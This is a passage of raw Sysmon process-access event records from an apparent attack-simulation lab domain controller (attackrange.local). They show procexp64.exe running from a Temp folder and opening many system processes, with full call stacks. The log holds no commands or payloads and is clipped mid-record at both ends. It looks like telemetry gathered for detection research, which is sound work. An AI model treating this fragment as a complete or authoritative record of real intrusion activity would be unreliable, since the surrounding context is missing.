ELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787488Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787487Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787486Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787485Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787484Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787483Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787482Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787481Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787480Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787479Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787478Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787477Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787476Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787475Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787474Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787473Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787472Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787471Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 